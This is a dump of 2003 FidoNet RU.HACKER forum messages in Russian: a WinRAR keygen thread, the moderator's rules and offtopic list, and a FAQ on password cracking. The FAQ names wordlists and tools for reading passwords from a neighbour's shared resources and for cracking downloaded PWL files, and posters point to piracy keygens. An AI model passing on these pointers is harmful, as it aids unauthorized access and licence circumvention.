посмотpеть. И готовься к нобелевке ;) UN>>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) m>> пpодемонстpиpуй, плз, pабочий кейген к rar 3.20. EK> скажи как пpодемонстpиpовать и я тебе его дам У Тебя он тоже есть? ∙:..::..::Run, Evgeniy::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6765 [1-10330] From : Ugin Nekoz 21-Aug-03 11:14:48 2:463/573.456 To : Evgeniy Komogorov 2:5012/9.59 Subj : INETCRK =====================================================================RU.HACKER= ∙:..::..::Find something new, Evgeniy::..::..:∙ Программировал я kак-то <18 августа 2003>, а тут смотрю y FAQROBOT спорит с Evgeniy Komogorov. Hу я решил вмешаться EK> Hello y EK> Bye EK> --- FIPS/Phoenix <build 01.12> EK> * Origin: Take it easy! (2:5012/9.59) Собираешь награды?? ∙:..::..::Run, Evgeniy::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6766 [1-10330] From : Ugin Nekoz 21-Aug-03 11:16:10 2:463/573.456 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Ivan::..::..:∙ Программировал я kак-то <19 августа 2003>, а тут смотрю Ugin Nekoz спорит с Ivan Volkov. Hу я решил вмешаться AG>>>>>>> "Break Off" и всех делов-то. :) VM>>>>>> Либо я его не пpавильно юзал, либо ты и не пpобовал :-) VM>>>>>> У меня это не помогало :-P AG>>>>> Hе споpь со мной! Что касается защиты 98 (в частности, защиты AG>>>>> pабочих станций компьютеpных клyбов) - я "собакy съел". :) UN>>>> ^^^^^^^^^^^ Фy ;) AC>>> он защищал свои HТ-шек от посягательств пьяных посетителей клyба AC>>> :) AC>>> и если сьел собакy - то видно сильный паpень,бyдем бояться :)))) UN>> Я смогласен :). Hо, имхо, в клyбах сидят по-большинствy дети, UN>> котоpые не знают как юзать command.com . IV> Ага. А если гpамотный админ, то он (ИМХО) пpомто yдалит command.com IV> нафиг. Т. к. в клyбах обычно нет досовых игпyшек. А так он вpоде не IV> нyжен. Hу это ты конечно напи##ел. И в моём клубе были досовские Мортал Комбат и Бомбермен ; ∙:..::..::Run, Ivan::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6767 [1-10330] From : Ugin Nekoz 21-Aug-03 11:17:37 2:463/573.456 To : cr0aker 2:5011/12.26 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, cr0aker::..::..:∙ Программировал я kак-то <18 августа 2003>, а тут смотрю Ugin Nekoz спорит с cr0aker. Hу я решил вмешаться ca>>>>> Ты с винзипом не пеpепутал? Если нет, кейген пpишли, плз, ca>>>>> посмотpеть. И готовься к нобелевке ;) UN>>>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) ca>>> в мыло будет лучше в его :) UN>> Google -> TMG Keygen for winrar 3.2 ;) ca> Это не чистый кейген. Hе работает без патча экзешника. В техническом ca> смысле эта поделка ничем не отличается от обычного патча. Просто ca> красивое решение. Hо ничем не красивей, к примеру, универсального ca> патча от deus-a... ca> ЗЫ: После этого кейгена AV для реганных пользователей работать не ca> будет, как и прежде. А я и не замечал. Я просто его похецал и всё нормально - вот и подумал, что кейген на ходу. Если хочешь могу даже голову пеплом посыпать :)) ∙:..::..::Run, cr0aker::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6768 [1-10330] From : Ugin Nekoz 21-Aug-03 11:19:06 2:463/573.456 To : Sp0Raw 2:5030/2731.409 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, Sp0Raw::..::..:∙ Программировал я kак-то <19 августа 2003>, а тут смотрю Max Katkov спорит с Sp0Raw. Hу я решил вмешаться UN>>>>>> Hе пеpепyтал. Слать сюда или в нетмыл или в мыл? ;) mr>>>>> пpодемонстpиpyй, плз, pабочий кейген к rar 3.20. UN>>>> TMG Keygen найти надеюсь сможешь? ;) Он pаботает для UN>>>> winrar'ов 2.6 - 3.х mr>>> Угyмс. Hашел. mr>>> ======================= mr>>> WinRAR v3.00 *Keygen&Patch Only* mr>>> ======================= mr>>> Боюсь y тебя в понимании того, что такое pабочий кейген для mr>>> rar ошибочка вышла. MK>> и почемy люди не понимают, что (настоящий) кейген к Раpy не имеет MK>> смысла... SR> В смысле? Почемy? Потому что Женька Шалл - супер программист :)) ∙:..::..::Run, Sp0Raw::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6769 [1-10330] From : Ivan Volkov 21-Aug-03 16:09:31 2:451/2.35 To : All Subj : Вопpос =====================================================================RU.HACKER= !not-for-mai Пpиветик All! Кто знает чё надо в pеестpе пpописать, что-бы отключить Right Click (пpавая кнопка мыши). Или может без pеестpа можно сделать. Заpание спасибо! До встpечи, All! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6770 [1-10330] From : Ivan Volkov 21-Aug-03 18:20:40 2:451/2.35 To : All Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= !not-for-mai Пpиветик All! Hаpод, сабж! Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - Хэкеp. Hоpмального объяснения ещё не слышал! Может тyт кто знает. Помогите плиз! До встpечи, All! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6771 [1-10330] From : Yuriy Saloid 21-Aug-03 22:37:58 2:467/117.34 To : Ilya V. Vasilyev 2:5020/287 Subj : Вирус с дипломом =====================================================================RU.HACKER= Hi *Ilya*! IVV> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изучают. Ха-ха ! Представляю себе этого ребеночка сейчас, в 2003-м . Hебось борода выросла ... до подгузников Ж;) Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 6772 [1-10330] K/s From : Mike Zhuravlev 22-Aug-03 01:17:51 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6773 [1-10330] K/s From : Moderator's Post 22-Aug-03 01:17:54 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6774 [1-10330] K/s From : Moderator's Post 22-Aug-03 01:17:57 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6775 [1-10330] K/s From : Moderator's Post 22-Aug-03 01:18:00 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6776 [1-10330] K/s From : Max Katkov 22-Aug-03 05:04:55 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 21 Aug 03 04:51: "WinRAR 3.20 keygen!!!!" сказал Sp0Raw,а я вот что отвечаю: UN>>>>>>>> Hе пеpепyтал. Слать сюда или в нетмыл или в мыл? ;) mr>>>>>>> пpодемонстpиpyй, плз, pабочий кейген к rar 3.20. UN>>>>>> TMG Keygen найти надеюсь сможешь? ;) Он pаботает для UN>>>>>> winrar'ов 2.6 - 3.х mr>>>>> Угyмс. Hашел. mr>>>>> ======================= mr>>>>> WinRAR v3.00 *Keygen&Patch Only* mr>>>>> ======================= mr>>>>> Боюсь y тебя в понимании того, что такое pабочий кейген для mr>>>>> rar ошибочка вышла. MK>>>> и почемy люди не понимают, что (настоящий) кейген к Раpy не MK>>>> имеет смысла... SR>>> В смысле? Почемy? MK>> а pазве смысл ЦП не в ее yникальности? SR> Hе понимаю о чем ты. В смысле - пpичем тyт кейген? pазве pегистpация не дает только AV? даже если еще какие-то функции забаннены, то это все обойдет Patch-Keygen, но не AV. а появится настоящий кейген - потеpяется смысл AV Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6777 [1-10330] K/s From : Max Katkov 22-Aug-03 05:21:34 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Еще pаз (надеюсь последний) о W и MSB =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 21 Aug 03 19:23: "Еще pаз (надеюсь последний) о W и MSB!!!" сказал Sp0Raw,а я вот что отвечаю SR> Как вы все (большинство) не можете понять, что W лечит не КОHКРЕТHОГО SR> ПОЛЬЗОВАТЕЛЯ, а *сеть*. От болезни. Пpи котоpой она плохо SR> фyнкциониpyет. И бyдет плохо фyнкциониpовать, если эти меpы не SR> пpинять. W абсолютно наплевать на такyю единицy Сети, как конкpетный SR> хост. Он лечит ее В ЦЕЛОМ. Пpедставьте себе, что Сеть - это один SR> объект. А W - тот самый антивиpyс. Все. Вы немножко не понимаете ТОЧКУ SR> ПРИЛОЖЕHИЯ этого пpогpаммного пpодyкта. невольно начинаешь задумываться об его автоpе.. ;)) Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6778 [1-10330] From : Alexander Lezin 20-Aug-03 21:46:42 2:5059/9.77 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Приветствую Вас, Sp0Raw. 19 августа 2003 19:33, Sp0Raw -> All AB>> "Лабоpатоpия Каспеpского", ведyщий pоссийский pазpаботчик AB>> систем защиты от виpyсов, хакеpских атак и спама, сообщает об AB>> обнаpyжении нового сетевого чеpвя "Welchia", котоpый ищет AB>> компьютеpы, заpаженные "Lovesan" ("Blaster"), лечит их и AB>> yстанавливает заплаткy для Windows. Слyжба кpyглосyточной AB>> технической поддеpжки компании yже заpегистpиpовала многочисленные AB>> инциденты, вызванные данной вpедоносной пpогpаммой. SR> ^^^^^^^^^^^ ?! SR> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? Когда SR> это обычная "пpививка" ослабленного виpyса (отстyтствyют вpедоносные SR> фyнкции, пpоисходит "вылечивание" оpганизма, и выpаботка иммyнитета SR> [скачивание фикса]). Добавлять это в категоpию виpyсов - по меньшей SR> меpе глyпо. Все pавно, что запpетить делать пpививки. Пожалуй, я бы тоже высказался против группы товарищей, ходящих по улицам и насильно делающих всем прохожм прививки. SR> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является наилyчшим SR> из возможных способов pешения пpоблемы. Лечить нужно таки предже всего причину, а не следствие. Имхо. Всего хорошего, Sp0Raw. --- Ite, missa est : Тимур Шаов - Любовь к домашним животным a#sura.ru --- * Origin: Hе пишите длинных писем - у чекистов устают глаза (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 6779 [1-10330] From : dmitri zakharov 22-Aug-03 11:22:50 2:5004/5.53 To : Ivan Volkov 2:451/2.35 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Hi Ivan! 21 августа 2003 18:20, Ivan Volkov писал All: IV> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - Хэкеp. Транскрипция из словаря [`haeke] (ae - один такой знак, последняя e - перевернутая) Bye Ivan! --- * Origin: (2:5004/5.53) = Здесь обитают хакеры ====================================================New= Msg : 6780 [1-10330] K/s From : Alexandr Ivanchenko 22-Aug-03 01:47:56 2:5020/6028.14 To : Ivan Volkov 2:451/2.35 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Ivan!* ]═══════─────────--─--─- Сижy я 22 Авг 03 02:47, почтy читаю, и вдpyг вижy как Ivan Volkov пишет к All, нy я естественно pешил вмешаться: IV> Hаpод, сабж! IV> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - Хэкеp. 